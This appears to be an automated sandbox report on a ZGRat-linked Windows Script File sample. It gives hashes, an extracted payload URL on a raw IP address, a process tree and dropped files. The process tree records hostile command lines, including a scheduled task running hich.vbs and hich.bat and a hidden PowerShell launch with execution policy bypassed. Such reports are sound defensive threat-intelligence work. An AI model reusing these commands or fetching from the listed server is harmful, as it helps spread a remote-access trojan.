Analysis
max time kernel: 145s
max time network: 122s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
submitted: 23/01/2024, 12:29
Static task: static1
Behavioral task: behavioral1
Sample: f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
Resource: win7-20231215-en
General
Target: f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf
Size: 144KB
MD5: d98237f1eb423d002ec4431002532420
SHA1: 3c03b0e124cf15312a0cf43e1a74a3827b027e29
SHA256: f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
SHA512: 9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f
SSDEEP
3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3
Malware Config
Extracted: http://185.81.157.103/96/1.txt
Signatures
Detect ZGRat V1 (1 IoCs)
  resource: behavioral1/memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp
  yara_rule: family_zgrat_v1
Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  3     1692  WScript.exe
  6     2744  powershell.exe
Drops file in System32 directory (1 IoCs)
  description: File opened for modification
  ioc: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
  Process: powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2744  powershell.exe
  1316  powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2744  powershell.exe
  Token: SeDebugPrivilege  1316  powershell.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process      procid_target
  PID 1692 wrote to memory of 2744   1692  WScript.exe  28
  PID 1692 wrote to memory of 2744   1692  WScript.exe  28
  PID 1692 wrote to memory of 2744   1692  WScript.exe  28
  PID 1040 wrote to memory of 2872   1040  taskeng.exe  34
  PID 1040 wrote to memory of 2872   1040  taskeng.exe  34
  PID 1040 wrote to memory of 2872   1040  taskeng.exe  34
  PID 2872 wrote to memory of 2540   2872  WScript.exe  37
  PID 2872 wrote to memory of 2540   2872  WScript.exe  37
  PID 2872 wrote to memory of 2540   2872  WScript.exe  37
  PID 2540 wrote to memory of 1316   2540  cmd.exe      36
  PID 2540 wrote to memory of 1316   2540  cmd.exe      36
  PID 2540 wrote to memory of 1316   2540  cmd.exe      36
Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Depth 1: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1692
Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2744
Depth 1: C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  PID:1040
Depth 2: C:\Windows\System32\WScript.exe
  Command line: C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
  - Suspicious use of WriteProcessMemory
  PID:2872
Depth 3: C:\Windows\System32\cmd.exe
  Command line: cmd /c ""C:\Users\Public\hich.bat" "
  - Suspicious use of WriteProcessMemory
  PID:2540
Depth 1: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1316
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 25af3af8f786943d78326df1a84fd5df
  SHA1: 331aa1b11635d06c4ab3e292139e134c3f907113
  SHA256: 6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a
  SHA512: d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp
  Filesize: 7KB
  MD5: ce37b88de003d46be6fb52b722efd721
  SHA1: 9817eb666450d67d8d1a96ba8d99b760132bc856
  SHA256: a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1
  SHA512: f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada

  Filesize: 195B
  MD5: 6c8a34a94e068b809145df09acbe153c
  SHA1: 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
  SHA256: c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
  SHA512: 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

  Filesize: 556KB
  MD5: b13a273e32d5763a07d712e5209055fa
  SHA1: 633dd0e5f647fee13536f74247159cdb07d72273
  SHA256: 2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486
  SHA512: 8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908

  Filesize: 686B
  MD5: 741b5b0a474f0e0cd28fd880f68723c0
  SHA1: 4de5489c4e56882514b3ab432048200eae65f90d
  SHA256: f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
  SHA512: 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54